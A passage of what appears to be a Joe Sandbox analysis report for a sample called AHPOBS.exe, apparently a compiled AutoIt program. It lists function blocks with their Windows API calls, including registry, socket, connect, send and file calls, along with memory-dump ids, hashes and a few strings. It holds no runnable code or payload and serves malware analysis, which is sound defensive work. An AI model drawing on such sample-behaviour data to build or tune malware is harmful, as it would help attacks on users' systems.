                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                      • String ID:
                                      • API String ID: 1690418490-0
                                      • Opcode ID: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                      • Instruction ID: 735ec6acd85acabf56193826cd071f2489ef818a13be6dc6b3d06c037ab4ab6a
                                      • Opcode Fuzzy Hash: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                      • Instruction Fuzzy Hash: D5E065315822216BD6261B346E4DBCF37A8EB2F752F141827F701D6250CB998445D7A8
                                      APIs
                                      • RegOpenKeyExW.KERNEL32(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                      • RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                      • RegCloseKey.KERNEL32(?), ref: 0040F2B5
                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Similarity
                                      • API ID: Close$OpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 1607946009-824357125
                                      APIs
                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                      • socket.WS2_32(00000002,00000001,00000006,00000000), ref: 004653FE
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                      • connect.WS2_32(00000000,?,00000010), ref: 00465446
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                      Similarity
                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 245547762-0
                                      APIs
                                      • LoadLibraryA.KERNEL32(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                      Strings
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: IsThemeActive$uxtheme.dll
                                      • API String ID: 2574300362-3542929980
                                      APIs
                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                      • gethostbyname.WS2_32(?,00000000,?,?), ref: 0046D42D
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                      • _memmove.LIBCMT ref: 0046D475
                                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 2502553879-0
                                      APIs
                                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                      • _free.LIBCMT ref: 004295A0
                                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                      Strings
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                      • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 3938964917-4224982150
                                      APIs
                                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,0040F545,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,004A90E8,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,?,0040F545), ref: 0041013C
                                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                      Strings
                                      Similarity
                                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                      • String ID: X$pWH
                                      • API String ID: 85490731-941433119
                                      Strings
                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                      • C:\Users\user\AppData\Local\Temp\AHPOBS.exe, xrefs: 00410107
                                      Similarity
                                      • API ID: _strcat
                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 1765576173-23898989
                                      APIs
                                      Similarity
                                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                      • String ID:
                                      • API String ID: 1794320848-0
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                      Similarity
                                      • API ID: Process$CurrentTerminate
                                      • String ID:
                                      • API String ID: 2429186680-0
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                        • Part of subcall function 00403B70: _memmove.LIBCMT ref: 00403BA7
                                      Strings
                                      Similarity
                                      • API ID: ByteCharMultiWide$_malloc_memmove
                                      • String ID: \5@
                                      • API String ID: 961785871-1309314528
                                      APIs
                                      • _malloc.LIBCMT ref: 0043214B
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • _malloc.LIBCMT ref: 0043215D
                                      • _malloc.LIBCMT ref: 0043216F
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _malloc$AllocateHeap
                                      • String ID:
                                      • API String ID: 680241177-0
                                      • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                      • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                      APIs
                                      • TranslateMessage.USER32(?), ref: 00409556
                                      • DispatchMessageW.USER32(?), ref: 00409561
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 4217535847-0
                                      • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                      • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                      • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                      • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                      APIs
                                      • _free.LIBCMT ref: 0043210A
                                        • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                        • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                      • _free.LIBCMT ref: 0043211D
                                      • _free.LIBCMT ref: 00432130
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                      • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                      • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                      • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 004678F7
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLast__wsplitpath_malloc
                                      • String ID:
                                      • API String ID: 4163294574-0
                                      • Opcode ID: 4eb00fd2027c101bc4b6a1a9689c90c0b2ca4839fbf5fc8dc7e3f24fd71574f6
                                      • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                      • Opcode Fuzzy Hash: 4eb00fd2027c101bc4b6a1a9689c90c0b2ca4839fbf5fc8dc7e3f24fd71574f6
                                      • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 147308135f3b21b59fe2a839e0a41f8f843447f64c0a584686d16692fa5d6b25
                                      • Instruction ID: 87b54257044150471c739d151235b364616bdb39e4aa39848fe8ade81c39f20a
                                      • Opcode Fuzzy Hash: 147308135f3b21b59fe2a839e0a41f8f843447f64c0a584686d16692fa5d6b25
                                      • Instruction Fuzzy Hash: 0E519371A00105EBCB14DFA5C8C1EABB7A8AF48344F1481AEF905AB692D77CED45C798
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00476D9C
                                      • GetForegroundWindow.USER32 ref: 00476DA2
                                        • Part of subcall function 0043137E: GetWindowRect.USER32(?,?), ref: 00431399
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$CursorForegroundRect
                                      • String ID:
                                      • API String ID: 1066937146-0
                                      • Opcode ID: 64d5885011cfa2bb1c2cc0e3e3ef3e7a49081bddc9b334e8cb07f4d0956804f9
                                      • Instruction ID: 55ebd84bf59828257d56c9a3402491d5f12838e90fd89218fbbc030d7b306cc7
                                      • Opcode Fuzzy Hash: 64d5885011cfa2bb1c2cc0e3e3ef3e7a49081bddc9b334e8cb07f4d0956804f9
                                      • Instruction Fuzzy Hash: 41310472600204ABDB20EF75C881B9EB3A5FF50318F20896EF944AB381DA76AD408794
                                      APIs
                                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                      • _strcat.LIBCMT ref: 0040F786
                                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                      • String ID:
                                      • API String ID: 3199840319-0
                                      • Opcode ID: 5208b12ad471a2730227345e1e602f2cfdbd4cb513b3309004b7f5d2f3316459
                                      • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                      • Opcode Fuzzy Hash: 5208b12ad471a2730227345e1e602f2cfdbd4cb513b3309004b7f5d2f3316459
                                      • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                      APIs
                                      • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0040D779
                                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: FreeInfoLibraryParametersSystem
                                      • String ID:
                                      • API String ID: 3403648963-0
                                      • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                      • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                      • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                      • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004613AC
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004613E7
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$_memmove_wcslen
                                      • String ID:
                                      • API String ID: 1589278365-0
                                      • Opcode ID: 5ae8bf698e5f2d94c98f8cadb67a2fdc902d57d9f8c184c00921b13cfd2101af
                                      • Instruction ID: 97a08093d25c12dededcbb20540d9e966b6334cc13c53f7fb5e1b12164f439a2
                                      • Opcode Fuzzy Hash: 5ae8bf698e5f2d94c98f8cadb67a2fdc902d57d9f8c184c00921b13cfd2101af
                                      • Instruction Fuzzy Hash: 0B1106322002142BE710AB299C46B9F7388AFA9324F04443BFA059B381EB79ED4543A9
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,D29EE858,00000000,00000000,00000000,00000000,?,00000000), ref: 0045F699
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 626452242-0
                                      • Opcode ID: 1e1e8d0a3663c58973bfbd173fe66e0169681d3aeb97779fe98f631588582ae4
                                      • Instruction ID: 12ecedb4b2f596ec27943498662edbbc84865b676a50f637fda156cf7353d85d
                                      • Opcode Fuzzy Hash: 1e1e8d0a3663c58973bfbd173fe66e0169681d3aeb97779fe98f631588582ae4
                                      • Instruction Fuzzy Hash: 3B0167713402047FF620A7569C8AF6B775CDB99B69F204026FF08DF291C5B4E8048769
                                      APIs
                                      • send.WS2_32(00000000,00000000,00000000,00000000,?,?), ref: 0046D1DE
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D202
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLastsend
                                      • String ID:
                                      • API String ID: 1802528911-0
                                      • Opcode ID: 08100c94a5b43882081f3a723f1166a421bc8f2402b282ab06c57959a902fbcb
                                      • Instruction ID: 3b0603a3594e44eb825cb878ac43b0a40af82fd82cd75190e916dcf9de0a17b0
                                      • Opcode Fuzzy Hash: 08100c94a5b43882081f3a723f1166a421bc8f2402b282ab06c57959a902fbcb
                                      • Instruction Fuzzy Hash: 1D11C476600204AFD310EF69D985B1BB7E8FB88324F10866EF858D7380DA35EC40C7A4
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                      • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                      • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
